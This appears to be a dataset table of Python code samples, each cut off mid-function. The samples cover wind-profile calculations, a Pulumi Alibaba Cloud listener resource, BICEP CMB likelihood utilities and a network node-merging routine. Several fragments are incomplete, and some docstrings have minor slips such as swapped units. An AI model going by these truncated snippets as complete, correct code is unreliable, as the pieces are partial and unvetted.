input
stringlengths 2.65k
237k
| output
stringclasses 1
value |
---|---|
dimenson is supplied
we assume meters per second.
reference_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
The height in which we measure the reference speed,
usually taken to be 10m/s in SimScale. If no dimenson is supplied
we assume meters.
height : float or np.array().astype(float64) or
pint.quantity.build_quantity_class.<locals>.Quantity
The heights in which to return the velocity results at, this can
be an array, or a single value. If no dimenson is supplied
we assume meters.
aerodynamic_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity
The aerodynamic roughness of the AbL profile.
return_without_units : bool.
True returns the numpy array as a numpy array without units assuming
the unit is default SI, this makes it harder to convert if using other
units.
debug : bool, optional
Returns more detail in the command line, more functionality to
be added later. The default is False.
Returns
-------
u : np.array().astype(float64) or pint.quantity.build_quantity_class.<locals>.Quantity
the velocity at specified height or heights.
'''
# return expected dimensional unit types
distance = 1 * unit.meter
distance_type = type(distance)
speed = 1 * unit.meter / unit.second
speed_type = type(speed)
# Check if the inputs have units, if not, assume the units are
# default SI units, i.e. meters for distance, meters/second for speed etc
if not isinstance(reference_speed, speed_type):
reference_speed = reference_speed * speed
if not isinstance(reference_height, distance_type):
reference_height = reference_height * distance
if not isinstance(aerodynamic_roughness, distance_type):
aerodynamic_roughness = aerodynamic_roughness * distance
if not isinstance(height, distance_type):
height = height * distance
if debug:
print(reference_speed)
print(reference_height)
print(aerodynamic_roughness)
print(height)
u_star = calulate_u_star(unit,
reference_speed,
reference_height,
aerodynamic_roughness,
return_without_units=False)
cmu = 0.09 # model coef
k = 0.41 # von karman constant
omega = ((u_star / (k * cmu ** 0.5))
* (1 / (height + aerodynamic_roughness)))
# If a raw numpy array is needed, we can simply ask for the same array
# stripped of its units
if return_without_units:
omega = np.array(omega)
return omega
def omega_AIJ(unit,
u,
tke,
return_without_units=True,
debug=False):
'''
Take reference values, return TKE at given height(s).
Parameters
----------
u : np.array().astype(float64) or pint.quantity.build_quantity_class.<locals>.Quantity
The height dependent streamwise wind speed.
tke : np.array().astype(float64) or pint.quantity.build_quantity_class.<locals>.Quantity
The height dependent turbulent kinetic energy.
return_without_units : bool.
True returns the numpy array as a numpy array without units assuming
the unit is default SI, this makes it harder to convert if using other
units.
debug : bool, optional
Returns more detail in the command line, more functionality to
be added later. The default is False.
Returns
-------
omega : np.array().astype(float64) or pint.quantity.build_quantity_class.<locals>.Quantity
The specific turbulent dissipation energy as a function of height.
'''
# return expected dimensional unit types
speed = 1 * unit.meter / unit.second
speed_type = type(speed)
turbulant_energy = 1 * unit.meter ** 2 / unit.second ** 2
turbulant_energy_type = type(turbulant_energy)
# Check if the inputs have units, if not, assume the units are
# default SI units, i.e. meters for distance, meters/second for speed etc
if not isinstance(u, speed_type):
u = u * speed
if not isinstance(tke, turbulant_energy_type):
tke = tke * turbulant_energy
if debug:
print(u)
print(tke)
cmu = 0.09 # turbulence model constant
velocity_gradient = np.gradient(u)
epsilon = (cmu ** (1 / 2)) * tke * velocity_gradient
omega = epsilon / (cmu * tke)
# If a raw numpy array is needed, we can simply ask for the same array
# stripped of its units
if return_without_units:
omega = np.array(omega)
return omega
def get_eurocode_minimum_height(unit, z0):
@unit.check('[length]')
def unit_check(z0):
if z0.check('[length]'):
original_unit = z0.units
z0.to(unit.meter)
z0 = z0.magnitude
return [z0, original_unit]
check = unit_check(z0)
x = [0.003, 0.01, 0.05, 0.3, 1.0]
y = [1, 1, 12, 5, 10]
interpolated_value = np.interp(check[0], x, y)
interpolated_value = interpolated_value * unit.meter
interpolated_value = interpolated_value.to(check[1])
return interpolated_value
def eurocode_meteo_corrector(unit,
reference_speed,
reference_height,
blend_height,
aerodynamic_roughness,
reference_roughness=0.05,
return_without_units=False):
'''
Take reference values, return the meteological correction factor
Parameters
----------
unit : pint.registry.UnitRegistry
A unit registary to do the dimensional calculations.
reference_speed : float or pint.quantity.build_quantity_class.<locals>.Quantity
The reference speed taken at the reference height,
usually taken to be 10m in SimScale. If no dimenson is supplied
we assume meters per second.
reference_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
The height in which we measure the reference speed,
usually taken to be 10m/s in SimScale. If no dimenson is supplied
we assume meters.
blend_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
Like the reference height, but higher, considered to be the height
in which the local roughness no longer effects the metological reading.
aerodynamic_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity
The aerodynamic roughness of the AbL profile.
reference_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
The roughness of the undesterbed boundary layer, not influenced
by local roughness. The default is 0.05.
Returns
-------
corrector : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
A dimensionless corrector used to correct for the metological readings.
'''
numerator = (u_eurocode(unit,
reference_speed,
reference_height,
blend_height,
reference_roughness,
return_without_units=return_without_units)
/ reference_speed)
denominator = (u_eurocode(unit,
reference_speed,
reference_height,
blend_height,
aerodynamic_roughness,
return_without_units=return_without_units)
/ reference_speed)
corrector = numerator / denominator
return corrector
def log_law_meteo_corrector(unit,
reference_speed,
reference_height,
blend_height,
aerodynamic_roughness,
reference_roughness=0.05,
return_without_units=False):
'''
Take reference values, return the meteological correction factor
Parameters
----------
unit : pint.registry.UnitRegistry
A unit registary to do the dimensional calculations.
reference_speed : float or pint.quantity.build_quantity_class.<locals>.Quantity
The reference speed taken at the reference height,
usually taken to be 10m in SimScale. If no dimenson is supplied
we assume meters per second.
reference_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
The height in which we measure the reference speed,
usually taken to be 10m/s in SimScale. If no dimenson is supplied
we assume meters.
blend_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
Like the reference height, but higher, considered to be the height
in which the local roughness no longer effects the metological reading.
aerodynamic_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity
The aerodynamic roughness of the AbL profile.
reference_roughness : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
The roughness of the undesterbed boundary layer, not influenced
by local roughness. The default is 0.05.
Returns
-------
corrector : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
A dimensionless corrector used to correct for the metological readings.
'''
numerator = (u_log_law(unit,
reference_speed,
reference_height,
blend_height,
reference_roughness,
return_without_units=return_without_units)
/ reference_speed)
denominator = (u_log_law(unit,
reference_speed,
reference_height,
blend_height,
aerodynamic_roughness,
return_without_units=return_without_units)
/ reference_speed)
corrector = numerator / denominator
return corrector
def power_law_meteo_corrector(unit,
reference_speed,
reference_height,
blend_height,
alpha,
reference_alpha=0.115,
return_without_units=False):
'''
Take reference values, return the meteological correction factor
Parameters
----------
unit : pint.registry.UnitRegistry
A unit registary to do the dimensional calculations.
reference_speed : float or pint.quantity.build_quantity_class.<locals>.Quantity
The reference speed taken at the reference height,
usually taken to be 10m in SimScale. If no dimenson is supplied
we assume meters per second.
reference_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
The height in which we measure the reference speed,
usually taken to be 10m/s in SimScale. If no dimenson is supplied
we assume meters.
blend_height : float or pint.quantity.build_quantity_class.<locals>.Quantity
Like the reference height, but higher, considered to be the height
in which the local roughness no longer effects the metological reading.
alpha : float or pint.quantity.build_quantity_class.<locals>.Quantity
The alpha of the AbL profile.
reference_alpha : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
The alpha of the undesterbed boundary layer, not influenced
by local roughness. The default is 0.05.
Returns
-------
corrector : float or pint.quantity.build_quantity_class.<locals>.Quantity, optional
A dimensionless corrector used to correct for the metological readings.
'''
numerator = (u_power_law(unit,
reference_speed,
reference_height,
blend_height,
reference_alpha,
return_without_units=return_without_units)
/ reference_speed)
denominator = (u_power_law(unit,
reference_speed,
reference_height,
blend_height,
alpha,
return_without_units=return_without_units)
/ reference_speed)
corrector = numerator / denominator
return corrector
def generic_power_law(reference,
reference_z,
exponent,
z):
'''
Parameters
----------
reference : float
A reference value to use in the power law.
reference_z : float
A reference .
exponent : TYPE
DESCRIPTION.
z : TYPE
DESCRIPTION.
Returns
-------
TYPE
DESCRIPTION.
'''
return reference * (z / reference_z) ** -exponent
class Error(Exception):
"""Base class for exceptions in this module."""
pass
class OrderError(Error):
"""Exception raised for errors in the input.
Attributes:
expression -- input expression in | |
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="proxyProtocol")
def proxy_protocol(self) -> Optional[pulumi.Input[bool]]:
"""
The proxy protocol of the listener. Default value is `false`. Valid value:
`true`: Turn on the keep client source IP function. After it is turned on, the back-end service is supported to view the original IP address of the client.
`false`: keep client source IP function is not turned on.
"""
return pulumi.get(self, "proxy_protocol")
@proxy_protocol.setter
def proxy_protocol(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "proxy_protocol", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The status of the listener.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
class Listener(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
accelerator_id: Optional[pulumi.Input[str]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
client_affinity: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy_protocol: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Provides a Global Accelerator (GA) Listener resource.
For information about Global Accelerator (GA) Listener and how to use it, see [What is Listener](https://help.aliyun.com/document_detail/153253.html).
> **NOTE:** Available in v1.111.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_accelerator = alicloud.ga.Accelerator("exampleAccelerator",
duration=1,
auto_use_coupon=True,
spec="1")
de_bandwidth_package = alicloud.ga.BandwidthPackage("deBandwidthPackage",
bandwidth=100,
type="Basic",
bandwidth_type="Basic",
payment_type="PayAsYouGo",
billing_type="PayBy95",
ratio=30)
de_bandwidth_package_attachment = alicloud.ga.BandwidthPackageAttachment("deBandwidthPackageAttachment",
accelerator_id=example_accelerator.id,
bandwidth_package_id=de_bandwidth_package.id)
example_listener = alicloud.ga.Listener("exampleListener",
accelerator_id=example_accelerator.id,
port_ranges=[alicloud.ga.ListenerPortRangeArgs(
from_port=60,
to_port=70,
)],
opts=pulumi.ResourceOptions(depends_on=[de_bandwidth_package_attachment]))
```
## Import
Ga Listener can be imported using the id, e.g.
```sh
$ pulumi import alicloud:ga/listener:Listener example <id>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] accelerator_id: The accelerator id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]] certificates: The certificates of the listener.
:param pulumi.Input[str] client_affinity: The clientAffinity of the listener. Default value is `NONE`. Valid values:
`NONE`: client affinity is not maintained, that is, connection requests from the same client cannot always be directed to the same terminal node.
`SOURCE_IP`: maintain client affinity. When a client accesses a stateful application, all requests from the same client can be directed to the same terminal node, regardless of the source port and protocol.
:param pulumi.Input[str] description: The description of the listener.
:param pulumi.Input[str] name: The name of the listener. The length of the name is 2-128 characters. It starts with uppercase and lowercase letters or Chinese characters. It can contain numbers and underscores and dashes.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]] port_ranges: The portRanges of the listener.
:param pulumi.Input[str] protocol: Type of network transport protocol monitored. Default value is `TCP`. Valid values: `TCP`, `UDP`, `HTTP`, `HTTPS`.
:param pulumi.Input[bool] proxy_protocol: The proxy protocol of the listener. Default value is `false`. Valid value:
`true`: Turn on the keep client source IP function. After it is turned on, the back-end service is supported to view the original IP address of the client.
`false`: keep client source IP function is not turned on.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ListenerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Global Accelerator (GA) Listener resource.
For information about Global Accelerator (GA) Listener and how to use it, see [What is Listener](https://help.aliyun.com/document_detail/153253.html).
> **NOTE:** Available in v1.111.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_accelerator = alicloud.ga.Accelerator("exampleAccelerator",
duration=1,
auto_use_coupon=True,
spec="1")
de_bandwidth_package = alicloud.ga.BandwidthPackage("deBandwidthPackage",
bandwidth=100,
type="Basic",
bandwidth_type="Basic",
payment_type="PayAsYouGo",
billing_type="PayBy95",
ratio=30)
de_bandwidth_package_attachment = alicloud.ga.BandwidthPackageAttachment("deBandwidthPackageAttachment",
accelerator_id=example_accelerator.id,
bandwidth_package_id=de_bandwidth_package.id)
example_listener = alicloud.ga.Listener("exampleListener",
accelerator_id=example_accelerator.id,
port_ranges=[alicloud.ga.ListenerPortRangeArgs(
from_port=60,
to_port=70,
)],
opts=pulumi.ResourceOptions(depends_on=[de_bandwidth_package_attachment]))
```
## Import
Ga Listener can be imported using the id, e.g.
```sh
$ pulumi import alicloud:ga/listener:Listener example <id>
```
:param str resource_name: The name of the resource.
:param ListenerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ListenerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
accelerator_id: Optional[pulumi.Input[str]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
client_affinity: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy_protocol: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ListenerArgs.__new__(ListenerArgs)
if accelerator_id is None and not opts.urn:
raise TypeError("Missing required property 'accelerator_id'")
__props__.__dict__["accelerator_id"] = accelerator_id
__props__.__dict__["certificates"] = certificates
__props__.__dict__["client_affinity"] = client_affinity
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
if port_ranges is None and not opts.urn:
raise TypeError("Missing required property 'port_ranges'")
__props__.__dict__["port_ranges"] = port_ranges
__props__.__dict__["protocol"] = protocol
__props__.__dict__["proxy_protocol"] = proxy_protocol
__props__.__dict__["status"] = None
super(Listener, __self__).__init__(
'alicloud:ga/listener:Listener',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
accelerator_id: Optional[pulumi.Input[str]] = None,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]]] = None,
client_affinity: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
proxy_protocol: Optional[pulumi.Input[bool]] = None,
status: Optional[pulumi.Input[str]] = None) -> 'Listener':
"""
Get an existing Listener resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] accelerator_id: The accelerator id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerCertificateArgs']]]] certificates: The certificates of the listener.
:param pulumi.Input[str] client_affinity: The clientAffinity of the listener. Default value is `NONE`. Valid values:
`NONE`: client affinity is not maintained, that is, connection requests from the same client cannot always be directed to the same terminal node.
`SOURCE_IP`: maintain client affinity. When a client accesses a stateful application, all requests from the same client can be directed to the same terminal node, regardless of the source port and protocol.
:param pulumi.Input[str] description: The description of the listener.
:param pulumi.Input[str] name: The name of the listener. The length of the name is 2-128 characters. It starts with uppercase and lowercase letters or Chinese characters. It can contain numbers and underscores and dashes.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ListenerPortRangeArgs']]]] port_ranges: The portRanges of the listener.
:param pulumi.Input[str] protocol: Type of network transport protocol monitored. Default value is `TCP`. Valid values: `TCP`, `UDP`, `HTTP`, `HTTPS`.
:param pulumi.Input[bool] proxy_protocol: The proxy protocol of the listener. Default value is `false`. Valid value:
`true`: Turn on the keep client source IP function. After it is turned on, the back-end service is supported to view the original IP address of the client.
`false`: keep client source IP function is not turned on.
:param pulumi.Input[str] status: The status of the listener.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ListenerState.__new__(_ListenerState)
__props__.__dict__["accelerator_id"] = accelerator_id
__props__.__dict__["certificates"] = certificates
__props__.__dict__["client_affinity"] = client_affinity
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["port_ranges"] = port_ranges
__props__.__dict__["protocol"] = protocol
__props__.__dict__["proxy_protocol"] = proxy_protocol
__props__.__dict__["status"] = status
return Listener(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="acceleratorId")
def accelerator_id(self) -> pulumi.Output[str]:
"""
The accelerator id.
"""
return pulumi.get(self, "accelerator_id")
@property
@pulumi.getter
def certificates(self) -> pulumi.Output[Optional[Sequence['outputs.ListenerCertificate']]]:
"""
The certificates of the listener.
"""
return pulumi.get(self, "certificates")
@property
@pulumi.getter(name="clientAffinity")
def client_affinity(self) -> pulumi.Output[Optional[str]]:
"""
The clientAffinity of the listener. Default value is `NONE`. Valid values:
`NONE`: client affinity is not maintained, that is, connection requests from the same client cannot always be directed to the same terminal node.
`SOURCE_IP`: maintain client affinity. When a client accesses a stateful application, all requests from the same client can be directed to the same terminal node, regardless of the source port and protocol.
"""
return pulumi.get(self, "client_affinity")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the listener.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the listener. The length of the name is 2-128 characters. It starts with uppercase and lowercase letters or Chinese characters. It can contain numbers and underscores and dashes.
| |
<reponame>EFrion/montepython_public
# bicep_util.py
#
# This is a module containing subfunctions to evaluate the bicep1 or bicep2 likelihood
#
# get_bpwf
# load_cmbfast
# calc_expvals
# read_data_products_bandpowers
# read_M
# calc_vecp
# g
# vecp
# saveLikelihoodToText
#
#$Id: bicep_util.py,v 1.1.2.5 2014/03/12 18:20:57 dbarkats Exp $ #
# IMPORTANT NOTE: This version was modified by <NAME>, in order to be
# flexible enough to work with a slightly different configuration.
from __future__ import print_function
import os
import numpy as np
from numpy import linalg as LA
from scipy.linalg import sqrtm
import io_mp
# Python 2.x - 3.x compatibility: Always use more efficient range function
try:
xrange
except NameError:
xrange = range
#####################################################################
def get_bpwf(exp='bicep1', root=''):
# This assumes you have the files
# windows/B1_3yr_bpwf_bin[1-9]_20131003.txt in the root directory
# windows/B2_3yr_bpwf_bin[1-9]_date.txt in the working directory if exp = 'bicep2'
if exp == 'bicep1':
# Load up BICEP1 bandpower window functions
file_in = os.path.join("windows", "B1_3yr_bpwf_bin?_20131003.txt")
print("### Reading the BICEP1 BPWF from file: %s" % file_in)
ncol = 580
elif exp == 'bicep2':
# Load up BICEP2 bandpower window functions
file_in = os.path.join("windows", "B2_3yr_bpwf_bin?_20140314.txt")
print("### Reading the BICEP2 BPWF from file: %s" % file_in)
ncol = 599
else:
print('exp must be "bicep1" or "bicep2" to load the proper window functions')
print('window functions must be in the root_directory/windows/')
print('bicep2 window functions available at http://bicepkeck.org/bicep2_2014_release')
print('bicep1 window functions available at bicep.rc.fas.harvard.edu/bicep1_3yr')
raise OSError()
# Initialize array so it's just like our Matlab version
bpwf_Cs_l = np.zeros([ncol, 9, 6])
for i in xrange(9):
window_file = file_in.replace('?', str(i+1))
try:
data = np.loadtxt(
os.path.join(root, window_file))
except OSError:
print("Error reading %s." % window_file +
"Make sure it is in root directory")
raise OSError()
bpwf_Cs_l[:, i, 0] = data[:, 1] # TT -> TT
bpwf_Cs_l[:, i, 1] = data[:, 2] # TE -> TE
bpwf_Cs_l[:, i, 2] = data[:, 3] # EE -> EE
bpwf_Cs_l[:, i, 3] = data[:, 4] # BB -> BB
bpwf_l = data[:, 0]
return (bpwf_l, bpwf_Cs_l)
#####################################################################
def load_cmbfast(file_in):
# Equivalent of load_cmbfast.m but doesn't read .fits for now
# (when it does, may want to change back). Right now we just want
# a simple .txt spectrum with columns
# We want the columns ordered TT TE EE BB TB EB. Note
# that standard CAMB output is TT EE BB TE...
# TB, EB, BT, BE are already zero.
print("### Loading input spectra from file: %s" % file_in)
try:
data = np.loadtxt(file_in)
except:
print("Error reading %s. Make sure it is in working directory" %file_in)
ell = data[:, 0]
# Initialize the Cs_l array
Cs_l = np.zeros([np.shape(data)[0], 9])
Cs_l[:, 0] = data[:, 1] # TT
Cs_l[:, 1] = data[:, 2] # TE
Cs_l[:, 2] = data[:, 3] # EE
Cs_l[:, 3] = data[:, 4] # BB
# Cs_l[:,4] # TB
# Cs_l[:,5] # EB
Cs_l[:, 6] = data[:, 2] # ET
# Cs_l[:,7] # BT
# Cs_l[:,8] = # BE
return (ell, Cs_l)
#####################################################################
def calc_expvals(inpmod_l, inpmod_Cs_l, bpwf_l, bpwf_Cs_l):
# Inputs
# inpmod: theory spectrum loaded by load_cmbfast (l, Cs_l)
# Contents: TT, TE, EE, BB, TB, EB, ET, BT, BE
# bpwf: bandpower window function from reduc_bpwf (l, Cs_l)
# Contents: TT, TP, EE->EE, BB->BB, EE->BB, BB->EE
nbin = np.shape(bpwf_Cs_l)[1]
# Don't assume inpmod and bpwf start at the same ell --
# CAMB spectra like to start at l=0 but bpwf can be higher.
# We do assume that both have delta ell = 1
nl = np.shape(bpwf_Cs_l)[0]
indx = np.arange(0,nl) # Python ranges want one more...
indx = indx + np.nonzero(bpwf_l[0]==inpmod_l)[0][0] # don't subtract 1
# Initialize expval array
expv = np.zeros([nbin,np.shape(bpwf_Cs_l)[2]])
# TT
x = bpwf_Cs_l[:,:,0]*np.transpose(np.tile(inpmod_Cs_l[indx,0],(nbin,1)))
expv[:,0] = np.sum(x,0)
# TE
x = bpwf_Cs_l[:,:,1]*np.transpose(np.tile(inpmod_Cs_l[indx,1],(nbin,1)))
expv[:,1] = np.sum(x,0)
# EE: x1 = EE->EE, x2 = BB->EE
x1 = bpwf_Cs_l[:,:,2]*np.transpose(np.tile(inpmod_Cs_l[indx,2],(nbin,1)))
x2 = bpwf_Cs_l[:,:,5]*np.transpose(np.tile(inpmod_Cs_l[indx,3],(nbin,1)))
expv[:,2] = np.sum(x1,0) + np.sum(x2,0)
# BB: x1 = BB->BB, x2 = EE->BB
x1 = bpwf_Cs_l[:,:,3]*np.transpose(np.tile(inpmod_Cs_l[indx,3],(nbin,1)))
x2 = bpwf_Cs_l[:,:,4]*np.transpose(np.tile(inpmod_Cs_l[indx,2],(nbin,1)))
expv[:,3] = np.sum(x1,0) + np.sum(x2,0)
# expv of TB, EB zero as initialized
return expv
#####################################################################
# Loads matrices C_fl: fiducial bandpowers (mean of s+n sims).
# C_l_hat: real data bandpowers
# and N_l: Noise bias bandpowers
# outputs them in an array bandpowers[i][j]
# i=0,1,2 for the three bandpower matrices j=0..8 for the 9 'l' bins
def read_data_products_bandpowers(exp='bicep1', root=""):
if exp == 'bicep1':
file_in="B1_3yr_likelihood_bandpowers_20131003.txt"
elif exp == 'bicep2':
file_in="B2_3yr_likelihood_bandpowers_20140314.txt"
else:
print('exp must be "bicep1" or "bicep2" to load the proper files')
print("### Reading fiducial, real, and noise bias bandpowers from file: %s"%file_in)
values = list()
try:
fin = open(os.path.join(root, file_in), 'r')
except OSError:
print("Error reading %s. Make sure it is in root directory" %file_in)
for line in fin:
if "#" not in line:
lst = line.split(' ')
if len(lst) > 3:
b = []
for elem in lst:
if elem != '':
b.append( float( elem ) )
values.append(b)
bandpowers = []
for i in range(3):
c = list()
for j in range(9):
c.append(values[ i*27 + j * 3: i*27 + j * 3 + 3 ])
bandpowers.append(c)
return bandpowers
#####################################################################
# Loads the M_cc matrix
# for bicep1 see details as defined in Barkats et al section 9.1
def read_M(exp='bicep1', root=""):
if exp =='bicep1':
file_in = "B1_3yr_bpcm_20131003.txt"
elif exp == 'bicep2':
file_in = "B2_3yr_bpcm_no-sysuncer_20140314.txt"
else:
print('exp must be bicep1 or bicep2 to load the proper files')
print("### Reading covariance matrix (M_cc) from file: %s" %file_in)
try:
data = np.loadtxt(os.path.join(root, file_in))
except OSError:
print("Error reading %s. Make sure it is in working directory" %file_in)
# HACK because file_in = "B2_3yr_bpcm_no-sysuncer_20140226.txt" has different format
if exp == 'bicep2':
data = data.reshape((54,54))
M_raw = np.array(data)
return M_raw
#####################################################################
# Utility functions used to calculate the likelihood
# for a given l bin.
def calc_vecp(l,C_l_hat,C_fl, C_l):
C_fl_12 = sqrtm(C_fl[l])
C_l_inv = LA.inv(C_l[l])
C_l_inv_12= sqrtm(C_l_inv)
# the order is inverted compared to matlab hamimeche_lewis_likelihood.m line 19
# line 20 of hamimeche_lewis_likelihood.m
res = np.dot(C_l_inv_12, np.dot(C_l_hat[l], C_l_inv_12))
[d, u] = LA.eigh(res)
d = np.diag(d) # noticed that python returns the eigenvalues as a vector, not a matrix
#np. dot( u, np.dot( np.diag(d), LA.inv(u))) should be equals to res
# real symmetric matrices are diagnalized by orthogonal matrices (M^t M = 1)
# this makes a diagonal matrix by applying g(x) to the eigenvalues, equation 10 in Barkats et al
gd = np.sign(np.diag(d) - 1) * np.sqrt(2 * (np.diag(d) - np.log(np.diag(d)) - 1))
gd = np.diag(gd)
# Argument of vecp in equation 8; multiplying from right to left
X = np.dot(np.transpose(u), C_fl_12)
X = np.dot(gd, X)
X = np.dot(u, X)
X = np.dot(C_fl_12, X)
# This is the vector of equation 7
X = vecp(X)
return X
#def g(x):
# # sign(x-1) \sqrt{ 2(x-ln(x) -1 }
# return np.sign(x-1) * np.sqrt( 2* (x - np.log(x) -1) )
def vecp(mat):
# This returns the unique elements of a symmetric matrix
# 2014-02-11 now mirrors matlab vecp.m
dim = mat.shape[0]
vec = np.zeros((dim*(dim+1)//2))
counter = 0
for iDiag in range(0,dim):
vec[counter:counter+dim-iDiag] = np.diag(mat,iDiag)
counter = counter + dim - iDiag
return vec
#####################################################################
# Function to evaluate the likelihood itself
def evaluateLikelihood(C_l,C_l_hat,C_fl,M_inv):
logL = 0
# Calculate X vector (Eq 8) for each l, lp
for l in range(0,9):
X = calc_vecp(l,C_l_hat,C_fl,C_l)
for lp in range(0,9):
#print(l, lp, r)
Xp = calc_vecp(lp,C_l_hat,C_fl,C_l)
M_inv_pp = M_inv[l,lp,:,:]
# calculate loglikelihood (Eq 7)
thislogL = (-0.5)*np.dot(X,np.dot(M_inv_pp,Xp))
logL = logL + thislogL
if np.isnan(logL):
logL = -1e20
logL = np.real(logL)
return logL
#####################################################################
# Utility function to save the likelihood vs r in a text file
def saveLikelihoodToText(rlist, logLike, field, exp='bicep1'):
if exp == 'bicep1':
print("### Saving Likelihood to file: B1_logLike.txt...")
f = open("B1_logLike.txt", "w")
f.write('# BICEP1 likelihood for r \n')
f.write('# Based on data from: Barkats et al, Degree Scale CMB Polarization Measurements from Three Years of BICEP1 Data \n')
f.write('# Available at http://bicep.rc.fas.harvard.edu/bicep1_3yr/ \n')
f.write('# This text file contains the tabulated likelihood for the tensor-to-scalar ratio, r, derived from the BICEP1 %s spectrum. \n'%field)
f.write('# Calculated via the "Hamimeche-Lewis likelihood" method described in Section 9.1 of Barkats et al. \n')
f.write('# This file is generated from a standalone python module: b1_r_wrapper.py \n')
f.write('# This likelihood curve corresponds to the blue curve from the left-hand panel of Figure | |
This
# will happen if one node is an ancestor of the other.
if n2 in ancestors.get(n1, []) or n1 in ancestors.get(n2, []):
continue
network = network.merge_nodes(
[n1, n2], nodeid2parents=nodeid2parents)
duplicates = _fix_node_id_pairs_after_merge(duplicates, n1, n2)
ancestors = _fix_node_id_dict_after_merge(ancestors, n1, n2)
nodeid2parents = _fix_node_id_dict_after_merge(
nodeid2parents, n1, n2)
changed = True
if not changed:
break
return network
def find_duplicate_data(self, network):
# Return list of (node_id1, node_id2) for DataNode objects
# that are duplicated. If no duplicates found, return an
# empty list.
# Make a list of all pairs of DataNode objects.
data_node_ids = [
node_id for (node_id, node) in enumerate(network.nodes)
if isinstance(node, DataNode)]
duplicates = []
for (i, j) in _iter_upper_diag(len(data_node_ids)):
node_id1, node_id2 = data_node_ids[i], data_node_ids[j]
node_1, node_2, = network.nodes[node_id1], network.nodes[node_id2]
if node_1.datatype.name != node_2.datatype.name:
continue
if node_1 == node_2:
duplicates.append((node_id1, node_id2))
return duplicates
class _OptimizeMergeData1:
# Sometimes the inference can lead to two nodes that share the
# same parents and the same children, and almost the same
# attributes. For example:
